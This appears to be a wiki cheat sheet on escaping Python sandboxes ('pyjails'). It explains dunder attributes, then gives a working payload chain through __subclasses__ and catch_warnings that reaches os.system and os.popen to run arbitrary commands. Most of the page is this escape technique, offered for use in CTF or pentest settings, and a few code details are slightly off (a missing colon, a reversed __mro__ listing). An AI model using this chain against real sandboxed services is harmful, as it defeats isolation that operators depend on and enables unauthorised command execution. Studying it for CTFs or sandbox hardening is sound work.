Navigating Python Objects

Navigate python objects and some tricks to bypass python sandbox protections, pyjails.

Methods

Description

__class__

Returns the object (class) to which the type belongs.

__mro__

Returns a tuple containing the base class inherited by the object. Methods are parsed in tuple order.

__subclasses__

Each new class retains references to subclasses, and this method returns a list of references still available in the class.

__builtins__

Returns the builtin methods included in a function.

__globals__

A reference to a dictionary that contains global variables for a function.

__base__

Returns the base class inherited from the object (__ base__ and __ mro__ are used to find the base class).

__init__

Class initialization method.

dir() command to show all methods and attributes of the object.

Goal: Find warnings (catch_warnings) because it imports the sys module (see HERE), and from sys you can reach os.

Get the string class

''.__class__
# <class ‘str’>

Going up by getting the inherited base classes (object)

''.__class__.__mro__
# [<class ‘object'> <class ‘str’> ]

Get all subclasses of object

''.__class__.__mro__[1].__subclasses__()
# [<class ‘…’> …]

Look for catch_warnings and its index.

for i in range(450)
   print(i, end=' ') 
   print(''.__class__.__mro__[1].__subclasses__()[i].__name__)
# index  NAME
# index  NAME 
# etc…

Import os and call the system. You can't see the output.

''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').system("COMMAND")
# error_code or 0 if the command was executed correctly

Import os and call popen with read(). You can see the output.

''.__class__.__mro__[1].__subclasses__()[<INDEX>]()._module.__builtins__['__import__']('os').popen("COMMAND").read()

Resources

Last updated 1 year ago

hashtagMethods

hashtagNavigation

hashtagResources

Methods

Navigation

Resources